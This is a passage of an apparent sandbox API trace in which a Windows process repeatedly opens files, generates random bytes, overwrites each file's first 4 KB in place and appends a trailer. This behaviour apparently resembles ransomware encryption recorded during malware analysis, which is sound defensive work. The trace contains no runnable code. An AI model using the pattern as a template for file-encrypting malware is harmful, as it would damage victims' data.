returned 1 [0085.896] GetProcessHeap () returned 0x4f10000 [0085.896] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.897] GetProcessHeap () returned 0x4f10000 [0085.897] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.897] GetProcessHeap () returned 0x4f10000 [0085.897] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.897] GetProcessHeap () returned 0x4f10000 [0085.897] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.897] GetProcessHeap () returned 0x4f10000 [0085.897] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.897] GetProcessHeap () returned 0x4f10000 [0085.897] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.897] GetProcessHeap () returned 0x4f10000 [0085.897] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.897] GetProcessHeap () returned 0x4f10000 [0085.897] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.897] GetProcessHeap () returned 0x4f10000 [0085.897] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.897] GetProcessHeap () returned 0x4f10000 [0085.897] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.897] GetProcessHeap () returned 0x4f10000 [0085.897] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.897] GetProcessHeap () returned 0x4f10000 [0085.897] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.897] GetProcessHeap () returned 0x4f10000 [0085.897] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.897] GetProcessHeap () returned 0x4f10000 [0085.897] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.897] GetProcessHeap () returned 0x4f10000 [0085.897] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.897] GetProcessHeap () returned 0x4f10000 [0085.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.898] GetProcessHeap () returned 0x4f10000 [0085.898] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.898] GetProcessHeap () returned 0x4f10000 [0085.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.898] GetProcessHeap () returned 0x4f10000 [0085.898] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.898] GetProcessHeap () returned 0x4f10000 [0085.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.898] GetProcessHeap () returned 0x4f10000 [0085.898] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.898] GetProcessHeap () returned 0x4f10000 [0085.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.898] GetProcessHeap () returned 0x4f10000 [0085.898] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0085.898] GetProcessHeap () returned 0x4f10000 [0085.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.898] GetProcessHeap () returned 0x4f10000 [0085.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0085.898] GetProcessHeap () returned 0x4f10000 [0085.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0085.898] GetProcessHeap () returned 0x4f10000 [0085.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.898] GetProcessHeap () returned 0x4f10000 [0085.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0085.898] SetFilePointerEx (in: hFile=0x9e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.898] WriteFile (in: hFile=0x9e0, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0085.899] WriteFile (in: hFile=0x9e0, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0085.899] GetProcessHeap () returned 0x4f10000 [0085.899] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0085.899] GetProcessHeap () returned 0x4f10000 [0085.899] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0085.899] GetProcessHeap () returned 0x4f10000 [0085.899] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0085.899] CloseHandle (hObject=0x9e0) returned 1 [0085.900] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 154 [0085.900] SetFilePointerEx (in: hFile=0x9e4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.900] ReadFile (in: hFile=0x9e4, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0085.900] SetFilePointerEx (in: hFile=0x9e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.900] GetProcessHeap () returned 0x4f10000 [0085.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0085.900] GetProcessHeap () returned 0x4f10000 [0085.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0085.900] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0085.900] GetProcessHeap () returned 0x4f10000 [0085.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0085.900] ReadFile (in: hFile=0x9e4, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0085.947] SetFilePointerEx (in: hFile=0x9e4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.948] WriteFile (in: hFile=0x9e4, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0085.948] GetProcessHeap () returned 0x4f10000 [0085.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0085.948] GetProcessHeap () returned 0x4f10000 [0085.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.948] GetProcessHeap () returned 0x4f10000 [0085.948] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0085.948] GetProcessHeap () returned 0x4f10000 [0085.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.948] GetProcessHeap () returned 0x4f10000 [0085.948] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0085.948] GetProcessHeap () returned 0x4f10000 [0085.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.948] GetProcessHeap () returned 0x4f10000 [0085.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.948] GetProcessHeap () returned 0x4f10000 [0085.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.948] GetProcessHeap () returned 0x4f10000 [0085.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.948] GetProcessHeap () returned 0x4f10000 [0085.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.948] GetProcessHeap () returned 0x4f10000 [0085.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.948] GetProcessHeap () returned 0x4f10000 [0085.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.948] GetProcessHeap () returned 0x4f10000 [0085.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.948] GetProcessHeap () returned 0x4f10000 [0085.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.948] GetProcessHeap () returned 0x4f10000 [0085.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.948] GetProcessHeap () returned 0x4f10000 [0085.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.949] GetProcessHeap () returned 0x4f10000 [0085.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.950] GetProcessHeap () returned 0x4f10000 [0085.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.950] GetProcessHeap () returned 0x4f10000 [0085.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.950] GetProcessHeap () returned 0x4f10000 [0085.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.950] GetProcessHeap () returned 0x4f10000 [0085.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0085.950] GetProcessHeap () returned 0x4f10000 [0085.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.950] GetProcessHeap () returned 0x4f10000 [0085.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0085.950] GetProcessHeap () returned 0x4f10000 [0085.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0085.950] GetProcessHeap () returned 0x4f10000 [0085.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0085.950] GetProcessHeap () returned 0x4f10000 [0085.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0085.950] GetProcessHeap () returned 0x4f10000 [0085.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0085.950] GetProcessHeap () returned 0x4f10000 [0085.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0085.950] GetProcessHeap () returned 0x4f10000 [0085.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.950] GetProcessHeap () returned 0x4f10000 [0085.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0085.950] GetProcessHeap () returned 0x4f10000 [0085.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.950] GetProcessHeap () returned 0x4f10000 [0085.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.950] GetProcessHeap () returned 0x4f10000 [0085.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.951] GetProcessHeap () returned 0x4f10000 [0085.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.951] GetProcessHeap () returned 0x4f10000 [0085.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.951] GetProcessHeap () returned 0x4f10000 [0085.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.951] GetProcessHeap () returned 0x4f10000 [0085.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.951] GetProcessHeap () returned 0x4f10000 [0085.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.951] GetProcessHeap () returned 0x4f10000 [0085.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.951] GetProcessHeap () returned 0x4f10000 [0085.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.951] GetProcessHeap () returned 0x4f10000 [0085.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.951] GetProcessHeap () returned 0x4f10000 [0085.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.951] GetProcessHeap () returned 0x4f10000 [0085.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.951] GetProcessHeap () returned 0x4f10000 [0085.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.951] GetProcessHeap () returned 0x4f10000 [0085.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.951] GetProcessHeap () returned 0x4f10000 [0085.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.951] GetProcessHeap () returned 0x4f10000 [0085.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.952] GetProcessHeap () returned 0x4f10000 [0085.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.952] GetProcessHeap () returned 0x4f10000 [0085.952] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.952] GetProcessHeap () returned 0x4f10000 [0085.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.952] GetProcessHeap () returned 0x4f10000 [0085.952] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.952] GetProcessHeap () returned 0x4f10000 [0085.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.952] GetProcessHeap () returned 0x4f10000 [0085.952] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.952] GetProcessHeap () returned 0x4f10000 [0085.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.952] GetProcessHeap () returned 0x4f10000 [0085.952] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0085.952] GetProcessHeap () returned 0x4f10000 [0085.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.952] GetProcessHeap () returned 0x4f10000 [0085.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0085.952] GetProcessHeap () returned 0x4f10000 [0085.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0085.952] GetProcessHeap () returned 0x4f10000 [0085.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.952] GetProcessHeap () returned 0x4f10000 [0085.952] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0085.952] SetFilePointerEx (in: hFile=0x9e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.952] WriteFile (in: hFile=0x9e4, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0085.953] WriteFile (in: hFile=0x9e4, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0085.953] GetProcessHeap () returned 0x4f10000 [0085.953] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0085.953] GetProcessHeap () returned 0x4f10000 [0085.953] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0085.953] GetProcessHeap () returned 0x4f10000 [0085.953] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0085.953] CloseHandle (hObject=0x9e4) returned 1 [0085.954] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 155 [0085.954] SetFilePointerEx (in: hFile=0x9e8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.954] ReadFile (in: hFile=0x9e8, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0085.954] SetFilePointerEx (in: hFile=0x9e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.954] GetProcessHeap () returned 0x4f10000 [0085.954] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0085.954] GetProcessHeap () returned 0x4f10000 [0085.954] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0085.954] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0085.954] GetProcessHeap () returned 0x4f10000 [0085.954] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0085.954] ReadFile (in: hFile=0x9e8, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0086.109] SetFilePointerEx (in: hFile=0x9e8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.109] WriteFile (in: hFile=0x9e8, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0086.109] GetProcessHeap () returned 0x4f10000 [0086.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0086.109] GetProcessHeap () returned 0x4f10000 [0086.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.109] GetProcessHeap () returned 0x4f10000 [0086.109] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0086.109] GetProcessHeap () returned 0x4f10000 [0086.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.109] GetProcessHeap () returned 0x4f10000 [0086.109] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0086.109] GetProcessHeap () returned 0x4f10000 [0086.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.109] GetProcessHeap () returned 0x4f10000 [0086.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.109] GetProcessHeap () returned 0x4f10000 [0086.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.109] GetProcessHeap () returned 0x4f10000 [0086.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.109] GetProcessHeap () returned 0x4f10000 [0086.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.109] GetProcessHeap () returned 0x4f10000 [0086.109] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.109] GetProcessHeap () returned 0x4f10000 [0086.109] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.109] GetProcessHeap () returned 0x4f10000 [0086.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.110] GetProcessHeap () returned 0x4f10000 [0086.110] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | 